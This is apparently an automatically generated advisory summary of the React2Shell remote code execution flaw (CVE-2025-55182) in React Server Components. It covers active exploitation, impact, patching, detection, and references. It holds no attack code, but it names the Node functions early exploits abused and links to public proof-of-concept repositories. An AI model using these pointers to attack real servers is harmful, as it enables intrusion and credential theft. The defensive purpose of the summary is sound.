Full Report
Security community needs to rally and share more info faster, one researcher says Amid new reports of attackers pummeling a maximum security hole (CVE-2025-55182) in the React JavaScript library, Cloudflare's technology chief said his company took down its own network, forcing a widespread outage early Friday, to patch React2Shell.…
Analysis Summary
# Vulnerability: React2Shell - Critical Unauthenticated RCE in React Server Components
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: 10.0 (Critical)
- CWE: Insecure Deserialization (Inferred from description of the flaw)
## Affected Systems
- Products: React JavaScript library, React Server Components, Next.js framework.
- Versions: Not explicitly listed, but implied to be affected versions prior to the patch release. The flaw was disclosed by the React team.
- Configurations: Applicable to instances running vulnerable React Server Components.
## Vulnerability Description
The vulnerability, dubbed "React2Shell," is an insecure deserialization flaw in React Server Components. Successful exploitation allows remote, unauthenticated attackers to execute arbitrary code on vulnerable instances. Reports indicate that initial functional Proof-of-Concepts (PoCs) circulated involved leveraging functions like `vm#runInThisContext`, `child_process#exec`, and `fs#writeFile`, although exploitation via these specific vectors would require manual configuration choices that enable client invocation of these dangerous functions.
## Exploitation
- Status: Exploited in the wild. The British government warned of active exploitation, and CISA added it to their KEV catalog. Threat actors (including China state-nexus groups) are reportedly scanning for vulnerable endpoints, attempting credential theft (e.g., AWS configs), and installing downloaders.
- Complexity: Low. Functional PoCs are circulating rapidly after disclosure.
- Attack Vector: Network (Remote).
## Impact
- Confidentiality: High (Confirmed attempts reported include theft of configuration and credential files).
- Integrity: High (Ability to execute arbitrary code).
- Availability: High (Confirmed to cause widespread outages due to attempted patch application, indicating high operational risk).
## Remediation
### Patches
- Specific official patch versions are not listed in the provided text, but immediate patching by the React team and affected frameworks (like Next.js) is necessary. Organizations must apply the official fixes released by component vendors.
### Workarounds
- No specific vendor workarounds are provided in the text. Mitigation efforts described focus on immediate patching. Cloudflare's attempt to mitigate led to an outage, highlighting the sensitivity of changes.
## Detection
- Indicators of Compromise (IoCs): Scanning for vulnerable RCE, reconnaissance activity, and attempts to access/steal configuration and credential files (e.g., AWS files). Installation of downloaders contacting external C2 infrastructure.
- Detection methods and tools: Active scanning/monitoring of network traffic and server logs for exploitation patterns targeting React Server Components endpoints. Security providers are actively updating detection rules.
## References
- Vendor Advisory (React Team Disclosure): hXXps://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- CISA KEV Catalog Addition: hXXps://www.cisa.gov/news-events/alerts/2025/12/05/cisa-adds-one-known-exploited-vulnerability-catalog
- Cloudflare Outage Explanation: hXXps://blog.cloudflare.com/5-december-2025-outage/
- Researcher POC: hXXps://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc
- Public PoC Example: hXXps://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3